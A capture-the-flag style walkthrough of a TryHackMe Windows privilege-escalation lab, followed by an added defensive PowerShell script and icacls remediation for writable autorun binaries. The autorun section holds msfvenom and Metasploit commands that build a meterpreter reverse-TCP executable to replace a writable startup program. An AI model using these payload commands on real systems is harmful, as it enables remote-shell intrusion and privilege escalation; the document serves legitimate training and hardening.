We just connect to the TryHackMe network over VPN.

This room will teach you a variety of Windows privilege escalation tactics, including kernel exploits, DLL hijacking, service exploits, registry exploits, and more. Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. This lab was built utilizing Sagi Shahar's privesc workshop () and utilized as part of The Cyber Mentor's Windows Privilege Escalation Udemy course ().

All tools needed to complete this course are on the user desktop (C:\Users\user\Desktop\Tools).

Deploy the machine and log into the user account via RDP. Your credentials are:

For any administrative actions you might take, your credentials are:

We click Start Machine on the challenge page and wait for the machine to deploy. Then we log in over RDP using the given credentials:

rdesktop -u user -p "password321" $IP -g 90%

2. Open a command prompt and run 'net user'. Who is the other non-default user on the machine?

By running net user in a command prompt we retrieve the users on the machine:

And the other non-default user is TCM.

In this task, we use the Autoruns utility, which lists the programs configured to start automatically at boot.

Open command prompt and type: C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
From the listed results, notice that the "My Program" entry is pointing to "C:\Program Files\Autorun Program\program.exe".
In command prompt type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
From the output, notice that the "Everyone" user group has "FILE_ALL_ACCESS" permission on the "program.exe" file.
Open command prompt and type: msfconsole
In Metasploit (msf > prompt) type: use multi/handler
In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
In Metasploit (msf > prompt) type: set lhost
Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost= -f exe -o program.exe
Copy the generated file, program.exe, to the Windows VM.
Place program.exe in 'C:\Program Files\Autorun Program'.
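The weakness the Autoruns and accesschk steps above uncover is a machine-wide Run entry whose target binary (or its directory) is writable by "Everyone". The following PowerShell script is an added example, not part of this writeup or the TryHackMe room, that performs the same check from the defender's side: it walks the HKLM Run/RunOnce keys, resolves each entry's executable, and reports any file or containing directory where a low-privileged principal holds write, modify, delete or ownership rights. It assumes it is run from an elevated Windows PowerShell 5.1+ session; the list of principals treated as low-privileged is an assumption you may need to extend for your environment.

```powershell
# Added example (not from the original writeup): audit machine-wide autorun
# entries for binaries that low-privileged principals could replace.
# Assumption: run as an administrator in Windows PowerShell 5.1 or later.

$RunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)

# Assumption: principals that should never hold write rights on a machine-wide autorun.
$WeakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these rights lets the holder overwrite, replace or re-ACL the file.
$R = [System.Security.AccessControl.FileSystemRights]
$WriteRights = $R::Write -bor $R::Modify -bor $R::FullControl -bor
               $R::WriteData -bor $R::AppendData -bor $R::Delete -bor
               $R::TakeOwnership -bor $R::ChangePermissions

function Get-ImagePath {
    # Extract the executable path from a Run value such as
    #   "C:\Program Files\Autorun Program\program.exe" /silent
    # or an unquoted command line whose path contains spaces.
    param([string]$Command)
    $cmd = $Command.Trim()
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 1) { return $cmd.Substring(1, $end - 1) }
        return $cmd.Trim('"')
    }
    # Unquoted: grow the prefix token by token until it names an existing file.
    $tokens = $cmd -split ' '
    for ($i = 0; $i -lt $tokens.Count; $i++) {
        $candidate = ($tokens[0..$i] -join ' ')
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    return $tokens[0]
}

function Test-WeakAcl {
    # Return one object per Allow ACE that grants a weak principal write-class rights.
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($WeakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $WriteRights) -ne 0) {
            [pscustomobject]@{
                Path      = $Path
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

foreach ($key in $RunKeys) {
    if (-not (Test-Path -Path $key)) { continue }
    $regKey = Get-Item -Path $key
    foreach ($name in $regKey.GetValueNames()) {
        $image = Get-ImagePath -Command ([string]$regKey.GetValue($name))
        if (-not (Test-Path -LiteralPath $image -PathType Leaf)) { continue }
        # Check the binary itself and its directory: write access to the
        # directory is enough to delete and replace the file.
        $findings = @(Test-WeakAcl -Path $image) +
                    @(Test-WeakAcl -Path (Split-Path -Parent $image))
        if ($findings.Count -gt 0) {
            Write-Output "[!] $key\$name -> $image"
            foreach ($f in $findings) {
                Write-Output "    $($f.Path): $($f.Principal) has $($f.Rights)"
            }
        }
    }
}
```

On the lab machine this flags the "My Program" entry because "Everyone" holds full control of program.exe, which is exactly what accesschk64 -wvu shows. Remediation is to strip the offending ACE (for example icacls "C:\Program Files\Autorun Program\program.exe" /remove:g Everyone) and confirm that only SYSTEM and Administrators retain write rights on both the file and its directory; the script can then be re-run as a regression check.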